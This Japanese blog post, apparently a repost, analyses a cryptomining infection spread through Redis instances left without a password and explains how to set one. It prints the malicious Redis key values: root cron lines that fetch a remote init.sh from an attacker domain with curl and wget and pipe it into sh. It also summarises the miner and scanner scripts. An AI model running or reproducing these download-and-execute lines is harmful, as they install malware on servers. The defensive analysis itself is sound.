コミュニティ 学ぶ ツールライブラリ レジャー
検索
日本語
ホームページ > データベース > Redis > 本文

Redis でパスワードを設定する必要がある理由は何ですか?

王林
リリース: 2023-05-26 14:17:22
転載
1961 人が閲覧しました

    redis でパスワードを設定する必要があるのはなぜですか?

    イントラネット環境ではパスワードを設定する必要はありませんが、個人サーバーやオンラインのパブリックネットワークサーバーではパスワードを設定する必要があります。

    昨日、redis で minio のイベント通知を確認したところ、redis キーを確認したところ、いくつか異常なキーが見つかりました。バックアップ1、バックアップ2、バックアップ3。それから私はそれがマイニングウイルスだと推測しました。

    以下に示すように: このようにして、スケジュールされたタスクとスクリプトがマシンに挿入され、init.sh スクリプトの実行が開始されます。 init.shスクリプト?

    en2an.top/cleanfda/in…

    このキーの値を確認すると、アドレスが要求されることがわかります。キーを開いて、この init.sh が何であるかを見てみましょう。

    以下にスクリプトファイルを示します。

    Redis でパスワードを設定する必要がある理由は何ですか?これには非常に多くのスクリプトがあります。selinux をオフにし、他の人のマイニング プロセスを強制終了し、CPU を大量に消費するプロセスを強制終了します。自分の場合は、システム コマンドの破棄、独自の downloads() 関数の作成、ロックされたタスクのロック解除と追加、マイニング テクノロジ タスクの追加、SSH パスワードなしのログインの設定、マイニング マシン マイニング プログラムのダウンロードと実行、ファイアウォールのオフ、ログ、既知の感染をクリアする パスワードのないマシンの場合は、is.sh をダウンロードして実行します。

    is.sh スクリプトの内容は何ですか?

    en2an.top/cleanfda/is…

    下の図に示すように、上記の init.sh は is.sh スクリプトをダウンロードします。

    Redis でパスワードを設定する必要がある理由は何ですか?このスクリプトの動作を見てみましょう。

    下の図に示すように、このスクリプトには非常に多くのコンテンツが含まれています。 Masscan スキャナーをダウンロードし、pnscan スキャナーをダウンロードし、redis をインストールして Redis の不正アクセスの脆弱性を作成し、rs.sh を実行します。

    Redis でパスワードを設定する必要がある理由は何ですか?rs.sh スクリプトの内容は何ですか?

    en2an.top/cleanfda/rs…

    このスクリプトの内容は、上記のリンクから表示できます。

    Redis でパスワードを設定する必要がある理由は何ですか?ポート 6379 を開き、redis を使用して承認なしでスケジュールされたタスクを自動的に書き込み、pnscan を使用してセグメント b の IP 6379 ポートをスキャンし、masscan を使用してポートをスキャンします。

    Redis のパスワードを設定するにはどうすればよいですか?

    上記の分析を通じて、このウイルスは基本的にマイニング スクリプトを Redis に挿入することによって機能すると結論付けることができます。 Redis にパスワードが設定されておらず、公共のインターネット上に公開されている場合は、注意してください。

    次の 2 つの方法で、redis のパスワードを設定できます。

    方法 1: redis.conf 構成ファイルを変更する

    この方法では構成ファイルを変更するため、有効にするには Redis を再起動する必要があることに注意してください。

    redis.conf ファイルを見つけます。

    Windows は次の図に示されています

    Redis でパスワードを設定する必要がある理由は何ですか?このファイルを編集し、requirepass を見つけ、コメントを解除し、指定された値を設定し、redis を再起動して取得します。効果。

    Redis でパスワードを設定する必要がある理由は何ですか?インストール方法は人によって異なると思うので、docker経由でインストールしてマッピングしました。ここでは説明しませんが、Linux にインストールされている redis ディレクトリを見つけて、設定ファイル redis.conf を探します Windows と同じ操作です 設定後、再起動すればOKです

    方法 2

    Redis に接続し、指示に従ってパスワードを設定します。

    この方法は比較的簡単で、再起動しなくても有効になります。

    次のコマンドは、パスワードを 123456 に設定することを意味します。パブリック ネットワークでは、これほど簡単にパスワードを設定すべきではありません。 

    backup1 "\n\n\n*/2 * * * * root cd1 -fsSL http://en2an.top/cleanfda/init.sh | sh\n\n"
backup2 "\n\n\n*/3 * * * * root wget -q -O- http://en2an.top/cleanfda/init.sh | sh\n\n"
backup3 "\n\n\n*/4 * * * * root curl -fsSL http://en2an.top/cleanfda/init.sh | sh\n\n"
backup4 "\n\n\n*/5 * * * * root wd1 -q -O- http://en2an.top/cleanfda/init.sh | sh\n\n"
    ログイン後にコピー

    Redis パスワードを確認してみましょう。 

    config set requirepass 123456
    ログイン後にコピー

    このようにして、パスワードが正常に設定され、redis クライアントを終了して再度接続すると有効になります。

    以上がRedis でパスワードを設定する必要がある理由は何ですか?の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

    関連ラベル:
    redis
    ソース:yisu.com
    前の記事:Redis ビット操作の使用方法 次の記事:Redis クラスタリングの 3 つの方法とは何ですか
    このウェブサイトの声明
    この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
    著者別の最新記事
    最新の問題
    Symfony Redis は、env ファイルで定義されたホスト (デフォルトは localhost) に接続できません キャッシュメカニズムとして Redis を使用した新しい Symfony セットアップがあります。デフォルトのローカルホストではなく、特定のホストに接続したいと考えています。運用環...
    から 2024-04-06 10:53:02
    0
    1
    375
    関連トピック
    詳細>
    人気のおすすめ
    人気のチュートリアル
    詳細>
    関連するチュートリアル
    人気のおすすめ
    最新のコース
    最新のダウンロード
    詳細>
    ウェブエフェクト
    公式サイト
    サイト素材
    フロントエンドテンプレート